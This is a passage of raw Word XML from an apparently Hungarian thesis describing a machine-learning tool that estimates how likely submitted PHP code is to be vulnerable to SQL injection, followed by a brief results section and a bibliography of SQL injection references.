      <w:r w:rsidR="00551062">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> három </w:t>
      </w:r>
      <w:r w:rsidR="00767CBC">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>sora erre ad példát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163355A7" w14:textId="2E214B8D" w:rsidR="00023E69" w:rsidRDefault="00023E69" w:rsidP="00100E7F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A87DC3C" w14:textId="7BED9CBF" w:rsidR="00100E7F" w:rsidRDefault="00EA1A69" w:rsidP="00100E7F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A69">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A3497D" wp14:editId="0FB8D669">
            <wp:extent cx="4468820" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="825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2620" cy="1704480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918E116" w14:textId="12AD3282" w:rsidR="00100E7F" w:rsidRDefault="00100E7F" w:rsidP="00100E7F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001B3B5F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F7628C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA59D5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ábra: a trainer.py kimenete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7FC310" w14:textId="77777777" w:rsidR="00100E7F" w:rsidRDefault="00100E7F" w:rsidP="00100E7F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A7AA3B" w14:textId="0C2E645C" w:rsidR="008C00B0" w:rsidRDefault="008B3537" w:rsidP="001E2B62">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A modell</w:t>
      </w:r>
      <w:r w:rsidR="00C50A41" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hez </w:t>
      </w:r>
      <w:r w:rsidR="00461B2F" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">utolsó lépésként </w:t>
      </w:r>
      <w:r w:rsidR="00C50A41" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="0013580B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z asztali alkalmazás</w:t>
      </w:r>
      <w:r w:rsidR="00C50A41" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B70DB0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>front-end</w:t>
      </w:r>
      <w:r w:rsidR="00C50A41" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D5DB9">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">oldaláról az </w:t>
      </w:r>
      <w:r w:rsidR="00992CDC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">first.fxml </w:t>
      </w:r>
      <w:r w:rsidR="00192497">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">felhasználói bemenete </w:t>
      </w:r>
      <w:r w:rsidR="00C50A41" w:rsidRPr="00702A88">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>biztosít ismeretlen adatokat</w:t>
      </w:r>
      <w:r w:rsidR="00EE3360">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyeket a </w:t>
      </w:r>
      <w:r w:rsidR="00C000FC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>back-end</w:t>
      </w:r>
      <w:r w:rsidR="00BC443F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650F50">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r w:rsidR="00BC443F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidR="00650F50">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BC443F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00EE3360" w:rsidRPr="00EE3360">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>toimport_vulnerabilities.php</w:t>
      </w:r>
      <w:r w:rsidR="00EE3360">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> néven ment el a többi PHP kód közé</w:t>
      </w:r>
      <w:r w:rsidR="00036606">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, majd navigál át a PrimaryController-be.</w:t>
      </w:r>
      <w:r w:rsidR="00A43167">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Itt </w:t>
      </w:r>
      <w:r w:rsidR="00A557FB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a kód a vektorizálásig ugyan azokon a lépéseken megy végig, mint a többi, ám nem lesz összefűzve </w:t>
      </w:r>
      <w:r w:rsidR="00552E09">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>velük</w:t>
      </w:r>
      <w:r w:rsidR="00A557FB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00344545">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Helyette </w:t>
      </w:r>
      <w:r w:rsidR="002032AC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">önálló vektorokat kap, amiket a </w:t>
      </w:r>
      <w:r w:rsidR="004446F1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">vecotirzer.py </w:t>
      </w:r>
      <w:r w:rsidR="004F5B53">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="002032AC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„toimport” numpy fájlokba ment le.</w:t>
      </w:r>
      <w:r w:rsidR="00C736DC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ezeket olvassa be a main metódus és ad át a classifier2-nek.</w:t>
      </w:r>
      <w:r w:rsidR="00402DEF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidR="00A16736">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>front-end</w:t>
      </w:r>
      <w:r w:rsidR="00402DEF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0066275B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>új kódo</w:t>
      </w:r>
      <w:r w:rsidR="0000674C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="0066275B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> bekérésén kívül az eredmények kiíratásáért is felelős</w:t>
      </w:r>
      <w:r w:rsidR="00CC30B0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>: a classifier2 által kií</w:t>
      </w:r>
      <w:r w:rsidR="0023410C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">rt </w:t>
      </w:r>
      <w:r w:rsidR="00654DB1">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>utolsó</w:t>
      </w:r>
      <w:r w:rsidR="0023410C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> két sor valószínűség</w:t>
      </w:r>
      <w:r w:rsidR="00E42340">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">i számait </w:t>
      </w:r>
      <w:r w:rsidR="009954E3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A9204D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>PrimaryController</w:t>
      </w:r>
      <w:r w:rsidR="009954E3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0032502F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>olvassa be és</w:t>
      </w:r>
      <w:r w:rsidR="0023410C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E622D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a hozzá tartozó primary.fxml</w:t>
      </w:r>
      <w:r w:rsidR="00DD2136">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082204F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szemlélteti </w:t>
      </w:r>
      <w:r w:rsidR="00DD2136">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kördiagram</w:t>
      </w:r>
      <w:r w:rsidR="006C5727">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> segítségével</w:t>
      </w:r>
      <w:r w:rsidR="00434803">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00493D54">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Emellett további információkat is szolgáltat többek között a</w:t>
      </w:r>
      <w:r w:rsidR="00AE4745">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z SQL injection veszélye</w:t>
      </w:r>
      <w:r w:rsidR="003F3626">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00AE4745">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ről</w:t>
      </w:r>
      <w:r w:rsidR="0004731A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F83DD7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00493D54">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>megelőzési módjairól</w:t>
      </w:r>
      <w:r w:rsidR="00A140F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, valamint megjeleníti a korábban megadott kódot és a program futási idejét.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FF066" w14:textId="24C658F7" w:rsidR="003B1873" w:rsidRPr="00D47FAE" w:rsidRDefault="000E59BD">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBFE71A" w14:textId="77777777" w:rsidR="000E59BD" w:rsidRPr="00D47FAE" w:rsidRDefault="000E59BD" w:rsidP="000E59BD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64501C89" w14:textId="0276ABF4" w:rsidR="004D1468" w:rsidRPr="00D47FAE" w:rsidRDefault="00E40924" w:rsidP="007C76B5">
      <w:pPr>
        <w:pStyle w:val="Stlus1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc71471978"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="187FDD4E" w14:textId="22F3FE9E" w:rsidR="004F3B11" w:rsidRPr="00D47FAE" w:rsidRDefault="004F3B11" w:rsidP="000E59BD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36637D7E" w14:textId="77777777" w:rsidR="00A1646B" w:rsidRPr="00D47FAE" w:rsidRDefault="00A1646B" w:rsidP="00A1646B">
      <w:pPr>
        <w:pStyle w:val="dto3"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5D56">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A korábbi összefoglalóban leírtak alapján kijelenthető, hogy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5D56">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> program </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a bemenetként megadott PHP kódra kimenetként </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">meghatározza azt, hogy a kód milyen valószínűséggel sérülékeny. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BA7C7" w14:textId="77777777" w:rsidR="00127779" w:rsidRPr="00D47FAE" w:rsidRDefault="00127779" w:rsidP="00127779">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E29DBF7" w14:textId="2FBDDD74" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D1205B" w:rsidP="00A62937">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FDD05" w14:textId="77777777" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="008E420C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7512EC" w14:textId="13D46553" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D1205B" w:rsidP="004F3B11">
      <w:pPr>
        <w:pStyle w:val="Cmsor2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc71471979"/>
      <w:r w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Irodalomjegyzék</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="08F26887" w14:textId="7C59B786" w:rsidR="00D1205B" w:rsidRPr="00D47FAE" w:rsidRDefault="00D1205B" w:rsidP="004F3B11">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38744C97" w14:textId="77777777" w:rsid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SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA4085" w14:textId="73240915" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00232336">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://portswigger.net/web-security/sql-injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487D692F" w14:textId="77777777" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FF6F56" w14:textId="77777777" w:rsid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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C0339" w14:textId="3C427728" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00232336">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://www.w3schools.com/sql/sql_injection.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE20608" w14:textId="77777777" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F301E95" w14:textId="77777777" w:rsid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Error Based SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA54C9A" w14:textId="68EC6E4C" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00232336">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://beaglesecurity.com/blog/vulnerability/error-based-sql-injection.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51504EA6" w14:textId="77777777" w:rsidR="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484E0FF5"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Beginner Guide to SQL Injection Boolean Based (Part 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7166C"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www.hackingarticles.in/beginner-guide-sql-injection-boolean-based-part-2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B42711" w14:textId="77777777" w:rsidR="00232336" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274B9E81"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Time Based Blind SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C80EC"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beaglesecurity.com/blog/vulnerability/time-based-blind-sql-injection.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAB134" w14:textId="77777777" w:rsidR="00232336" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2CFF12"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Blind Out-of-band SQL Injection vulnerability testing added to AcuMonitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B420D96"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www.acunetix.com/blog/articles/blind-out-of-band-sql-injection-vulnerability-testing-added-acumonitor/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010083D" w14:textId="77777777" w:rsidR="00232336" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4218D058"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Mike Shema 2012. SQL Injection &amp; Data Store Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDA50C"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www.sciencedirect.com/topics/computer-science/prepared-statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B19879" w14:textId="77777777" w:rsidR="00232336" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D332F00"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SQL Injection Prevention Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9EF30E"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cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDF5B31" w14:textId="77777777" w:rsidR="00232336" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BA5159"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Alex Kaechele 2018. Classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E286BE" w14:textId="14CFA890" w:rsidR="004F3B11" w:rsidRPr="00232336" w:rsidRDefault="00232336" w:rsidP="00232336">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00232336">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>https://rpubs.com/alexkaechele/380330</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71865B75" w14:textId="4A6F7D1B" w:rsidR="00D1205B" w:rsidRPr="00232336" w:rsidRDefault="00D1205B" w:rsidP="00232336">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00232336">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DAB00A" w14:textId="77777777" w:rsidR="00A62937" w:rsidRPr="00D47FAE" w:rsidRDefault="00A62937" w:rsidP="00A62937">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
